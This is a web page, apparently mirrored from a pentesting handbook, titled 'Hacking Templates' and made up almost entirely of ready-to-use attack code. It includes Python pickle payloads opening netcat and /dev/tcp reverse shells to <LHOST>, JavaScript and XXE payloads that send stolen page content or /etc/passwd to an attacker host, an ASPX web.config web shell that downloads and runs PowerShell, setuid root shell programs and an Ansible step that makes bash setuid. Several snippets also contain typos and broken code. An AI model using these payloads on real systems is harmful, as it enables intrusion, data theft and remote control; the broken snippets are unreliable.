🇬🇹Hacking Templates

Reference : https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/templates.md

01 Information Gathering

02 Vulnerability Analysis

03 Web Application Analysis

Hypertext Markup Language (HTML)

Hypertext Markup Language (HTML) Injection

<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script>

JavaScript (JS)

JavaScript (JS) Fetch Uniform Resource Locator (URL) and Base64 Encoding

<script>fetch('http://<RHOST>/auth.php').then(r => r.text()).then(d => fetch("http://<LHOST>"+btoa(d)));</script>

const Req1 = new XMLHttpRequest();
Req1.open("GET", "http://<RHOST>/index.php", true);

Req1.onload = function(Event) {
        const response = btoa(Req1.response);

        const Req2 = new XMLHttpRequest();
        Req2.open("GET", "http://<LHOST>/?"+response, true);
        Req2.send();
};
Req1.send();

JavaScript Object Notation (JSON)

JavaScript Object Notation (JSON) POST Request with Authentication

POST /<PATH> HTTP/1.1
Host: <RHOST>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/json
Content-Length: 95
Connection: close

{
  "auth":{
    "name":"<USERNAME>",
    "password":"<PASSWORD>"
  },
  "filename":"<FILE>"
}

Python

Python Pickle Remote Code Execution (RCE)

import pickle
import sys
import base64

command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat <LHOST> <LHOST> > /tmp/f'

class rce(object):
    def __reduce__(self):
        import os
        return (os.system,(command,))

print(base64.b64encode(pickle.dumps(rce())))

import base64
import pickle
import os

class RCE:
	def __reduce__(self):
		cmd = ("/bin/bash -c 'exec bash -i &>/dev/tcp/<LHOST>/<LPORT> <&1'")
		return = os.system, (cmd, )

if __name__ == '__main__':
	pickle = pickle.dumps(RCE())
	print(bas64.b64encode(pickled))

Python Redirect for Server-Side Request Forgery (SSRF)

#!/usr/bin/python3
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

class Redirect(BaseHTTPRequestHandler):
  def do_GET(self):
      self.send_response(302)
      self.send_header('Location', sys.argv[1])
      self.end_headers()

HTTPServer(("0.0.0.0", 80), Redirect).serve_forever()

sudo python3 redirect.py http://127.0.0.1:3000/

#!/usr/bin/env python

import SimpleHTTPServer
import SocketServer
import sys
import argparse

def redirect_handler_factory(url):
    """
    returns a request handler class that redirects to supplied `url`
    """
    class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
       def do_GET(self):
           self.send_response(301)
           self.send_header('Location', url)
           self.end_headers()

       def do_POST(self):
           self.send_response(301)
           self.send_header('Location', url)
           self.end_headers()

    return RedirectHandler


def main():

    parser = argparse.ArgumentParser(description='HTTP redirect server')

    parser.add_argument('--port', '-p', action="store", type=int, default=80, help='port to listen on')
    parser.add_argument('--ip', '-i', action="store", default="", help='host interface to listen on')
    parser.add_argument('redirect_url', action="store")

    myargs = parser.parse_args()

    redirect_url = myargs.redirect_url
    port = myargs.port
    host = myargs.ip

    redirectHandler = redirect_handler_factory(redirect_url)

    handler = SocketServer.TCPServer((host, port), redirectHandler)
    print("serving at port %s" % port)
    handler.serve_forever()

if __name__ == "__main__":
    main()

Python Web Request

import requests
import re

http_proxy  = "http://127.0.0.1:8080"
proxyDict = {
              "http"  : http_proxy,
            }
// get a session
r = requests.get('http://')
// send request
r = requests.post('<RHOST>', data={'key': 'value'}, cookies={'PHPSESSID': r.cookies['PHPSESSID']} , proxies=proxyDict)

Web Shells

Active Server Page Extended (ASPX)

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://<LHOST>/shellyjelly.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->

Extensible Markup Language (XML)

Extensible Markup Language (XML) Hypertext Markup Language (HTTP) Request (XHR) in JavaScript (JS)

Payload

var xhr = new XMLHttpRequest();
xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:8080/users/');
xhr.onreadystatechange = function() {
  var users = JSON.parse(xhr.responseText);
  if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
    for (var i = 0; i < users.length; ++i) {
      console.table(users[i]);
    }
  } else {
    console.error('There was a problem with the request. ' + users);
  }
}
xhr.send();

Forged Request

myhttpserver = 'http://<LHOST>/'
targeturl = 'http://<RHOST>/'

req = new XMLHttpRequest;
req.onreadystatechange = function() {
    if (req.readyState == 4) {
            req2 = new XMLHttpRequest;
            req2.open('GET', myhttpserver + btoa(this.responseText),false);
            req2.send();
        }
}
req.open('GET', targeturl, false);
req.send();

Simple Version

req = new XMLHTTPRequest;
req.open('GET',"http://<RHOST>/revshell.php");
req.send();

Extensible Markup Language (XML)

Extensible Markup Language (XML) External Entity (XXE)

Request

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % <NAME> SYSTEM 
"http://<LHOST>/<FILE>.dtd">%<NAME>;]>
<root>
<method>GET</method>
<uri>/</uri>
<user>
<username><NAME>;</username>
<password><NAME></password>
</user>
</root>

Content of .dtd

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://<LHOST>/?f=%file;'>">
%eval;
%exfiltrate;

Cross-Site Scripting (XSS)

JavaScript (JS) to read Files on the System (.js)

const fs = require('fs');

fs.readFile('/etc/passwd', 'utf8', (err, data) => {
  if (err) throw err;
  console.log(data);
});

Payload from Extensible Markup Language (XML) File

<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="http://w3.org/1999/xhtml">
<html:script>prompt(document.domain);</html:script>
</html>

04 Database Assessment

05 Password Attacks

06 Wireless Attacks

07 Reverse Engineering

08 Exploitation Tools

09 Sniffing & Spoofing

10 Post Exploitation

YAML Ain't Markup Language (YAML)

Bad YAML Ain't Markup Language (YAML)

- hosts: localhost
  tasks:
    - name: badyml
      command: chmod +s /bin/bash

11 Forensics

12 Reporting Tools

Basics

C

Shell Option 1

#include <unistd.h>
#include <errno.h>

main( int argc, char ** argv, char ** envp )
{
    setuid(0);
    setgid(0);
    envp = 0;
    system ("/bin/bash", argv, envp);
return;
}

Shell Option 2

#include <stdio.h>
#include <stdlib.h>
#include <stdlib.h>

int main() {
    setuid(0);
    setgid(0);

    system("/bin/bash");
    return 0;
}

Compiling

$ gcc -o shell shell.c

Secure Shell (SSH)

Secure Shell (SSH) Program Execution

#!/usr/bin/python
from pwn import *

s =  ssh(host='', user='', password='')
p = s.run('cd <PATH> && ./<vuln>')
p.recv()
p.sendline(<payload>)
p.interactive()
s.close()

Exploiting

Python

Skeleton Exploit Python Script

https://github.com/0xsyr0/Buffer_Overflow

#!/usr/bin/python

import socket,sys

address = '127.0.0.1'
port = 9999
buffer = #TBD

try:
	print '[+] Sending buffer'
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((address,port))
	s.recv(1024)
	s.send(buffer + '\r\n')
except:
 	print '[!] Unable to connect to the application.'
 	sys.exit(0)
finally:
	s.close()

PreviousShodan Dorks NextCheat-sheet's

Last updated 2 years ago

hashtagTable of Contents

hashtag01 Information Gathering

hashtag02 Vulnerability Analysis

hashtag03 Web Application Analysis

hashtagHypertext Markup Language (HTML)

hashtagJavaScript (JS)

hashtagJavaScript Object Notation (JSON)

hashtagPython

hashtagWeb Shells

hashtagExtensible Markup Language (XML)

hashtagExtensible Markup Language (XML)

hashtagCross-Site Scripting (XSS)

hashtag04 Database Assessment

hashtag05 Password Attacks

hashtag06 Wireless Attacks

hashtag07 Reverse Engineering

hashtag08 Exploitation Tools

hashtag09 Sniffing & Spoofing

hashtag10 Post Exploitation

hashtagYAML Ain't Markup Language (YAML)

hashtag11 Forensics

hashtag12 Reporting Tools

hashtag13 Social Engineering Tools

hashtagBasics

hashtagC

hashtagSecure Shell (SSH)

hashtagExploiting

hashtagPython

Table of Contents

01 Information Gathering

02 Vulnerability Analysis

03 Web Application Analysis

Hypertext Markup Language (HTML)

JavaScript (JS)

JavaScript Object Notation (JSON)

Python

Web Shells

Extensible Markup Language (XML)

Extensible Markup Language (XML)

Cross-Site Scripting (XSS)

04 Database Assessment

05 Password Attacks

06 Wireless Attacks

07 Reverse Engineering

08 Exploitation Tools

09 Sniffing & Spoofing

10 Post Exploitation

YAML Ain't Markup Language (YAML)

11 Forensics

12 Reporting Tools

13 Social Engineering Tools

Basics

C

Secure Shell (SSH)

Exploiting

Python